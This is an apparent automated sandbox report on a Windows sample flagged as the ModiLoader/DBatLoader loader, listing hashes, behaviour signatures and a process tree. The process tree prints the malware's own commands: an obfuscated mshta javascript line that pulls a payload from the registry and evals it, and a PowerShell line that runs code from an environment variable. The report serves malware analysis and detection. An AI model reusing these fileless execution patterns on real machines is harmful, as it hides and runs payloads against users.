Analysis

  • max time kernel
    143s
  • max time network
    104s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 10:33

General

  • Target

    66f636adfb8c7788221e29a2ad39c36b_JaffaCakes118.exe

  • Size

    261KB

  • MD5

    66f636adfb8c7788221e29a2ad39c36b

  • SHA1

    20b278745d2cf6d2df9688bdd58b4feace76576c

  • SHA256

    32cb28f0b9b96442d26e087c7aa42cc6f2ca47f77042cb055a1e92ef78972f0b

  • SHA512

    7e6b80cc25126d18f636b4fbd2c505b405b73e17ef9f77b5b5f47588420a7b9b348aa081a10bbcc6aeb4048995160eef51a1296967f488738988fb376a044e98

  • SSDEEP

    6144:JkGS17CZemTTwkkbBX5QAVPAjdYmHO40bozYqdtLkx:Jkl4T3wxxlPAjdYiODbYto

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\66f636adfb8c7788221e29a2ad39c36b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\66f636adfb8c7788221e29a2ad39c36b_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Users\Admin\AppData\Local\Temp\66f636adfb8c7788221e29a2ad39c36b_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\66f636adfb8c7788221e29a2ad39c36b_JaffaCakes118.exe"
      2⤵
        PID:884
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:V4HWvWbzY="Ho";r0z=new%20ActiveXObject("WScript.Shell");DEbIv7t="Zd6HvzaZ7T";P8A3nd=r0z.RegRead("HKLM\\software\\Wow6432Node\\UDjlsIhX\\bccSZ0sCBO");TZQVJYB3k="6djwZu7Ecs";eval(P8A3nd);gPNjLZA44U="LM2JaWYx1w";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4764
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:oevazg
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2520

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hzy1wh1q.pge.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/884-13-0x0000000000870000-0x0000000000944000-memory.dmp
      Filesize

      848KB

    • memory/884-8-0x0000000000870000-0x0000000000944000-memory.dmp
      Filesize

      848KB

    • memory/884-3-0x0000000000400000-0x0000000000439000-memory.dmp
      Filesize

      228KB

    • memory/884-7-0x0000000000870000-0x0000000000944000-memory.dmp
      Filesize

      848KB

    • memory/884-5-0x0000000000400000-0x0000000000439000-memory.dmp
      Filesize

      228KB

    • memory/884-11-0x0000000000870000-0x0000000000944000-memory.dmp
      Filesize

      848KB

    • memory/884-10-0x0000000000870000-0x0000000000944000-memory.dmp
      Filesize

      848KB

    • memory/884-9-0x0000000000870000-0x0000000000944000-memory.dmp
      Filesize

      848KB

    • memory/884-12-0x0000000000870000-0x0000000000944000-memory.dmp
      Filesize

      848KB

    • memory/884-6-0x0000000000400000-0x0000000000439000-memory.dmp
      Filesize

      228KB

    • memory/2520-16-0x0000000005130000-0x0000000005758000-memory.dmp
      Filesize

      6.2MB

    • memory/2520-17-0x0000000004FD0000-0x0000000004FF2000-memory.dmp
      Filesize

      136KB

    • memory/2520-19-0x0000000005840000-0x00000000058A6000-memory.dmp
      Filesize

      408KB

    • memory/2520-18-0x0000000005760000-0x00000000057C6000-memory.dmp
      Filesize

      408KB

    • memory/2520-15-0x0000000004A00000-0x0000000004A36000-memory.dmp
      Filesize

      216KB

    • memory/2520-29-0x00000000058B0000-0x0000000005C04000-memory.dmp
      Filesize

      3.3MB

    • memory/2520-30-0x0000000005D80000-0x0000000005D9E000-memory.dmp
      Filesize

      120KB

    • memory/2520-31-0x0000000005DC0000-0x0000000005E0C000-memory.dmp
      Filesize

      304KB

    • memory/2520-32-0x00000000073E0000-0x0000000007A5A000-memory.dmp
      Filesize

      6.5MB

    • memory/2520-33-0x00000000062A0000-0x00000000062BA000-memory.dmp
      Filesize

      104KB

    • memory/2736-0-0x0000000000400000-0x000000000040D000-memory.dmp
      Filesize

      52KB